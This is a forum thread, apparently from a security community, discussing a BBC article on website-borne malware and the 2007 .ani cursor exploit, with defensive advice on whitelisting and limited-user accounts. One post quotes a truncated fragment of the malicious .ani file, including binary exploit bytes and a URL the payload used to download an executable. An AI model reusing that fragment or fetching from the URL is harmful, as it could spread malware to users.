BBC Malware News

http://news.bbc.co.uk/2/hi/technology/6591183.stm

Interesting....

 

It,s very concerning.

Edit: Removed a sentence that,s no so true!

 

Very interesting article! A bit lame in the advice, however:

For the Dolphins web page hack mentioned in the article -- the above advice was of no use on the first day when thousands were hit.

sans.org added an update to their advisory:

http://isc.sans.org/diary.html?storyid=2151

Another example was the new *.ani exploit. The payload was triggered by the .ani file cached by means of code embedded in a web site:

Code:

RIFF  ACONanih$   $   ÿÿ 
.....

Å6‰D$aÃèþÿÿ  http://newasp.com.cn/xx.exe

It's not surprising that the BBC article didn't mention White List protection, since Sophos deals primarily with Black List solutions -- solutions which are very effective when the companies have the signature in their database, and, assuming that the user has the updates. How many average users update daily?

Anyone, however, with even the now-maligned-out-of-date ProcessGuard would have been protected from this.

Less esoteric solutions would include running as Limited User.

In both cases, the OS being yet unpatched, the .ani file would cache, but the payload would not execute.

Tricky, clever, sophisticated attack, ultimately using same old method of infection: download/install an executable.

While articles like this are informative, the general reader is left with a feeling of uncertainty, maybe even dread: Gee, dare I visit any website? - unless the reader investigates more deeply in to the situation and realizes that secure solutions are at hand!

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."

--Bruce Schneier​

 

U are right. They will never sugest anything more th scanners. That makes sense. They need business.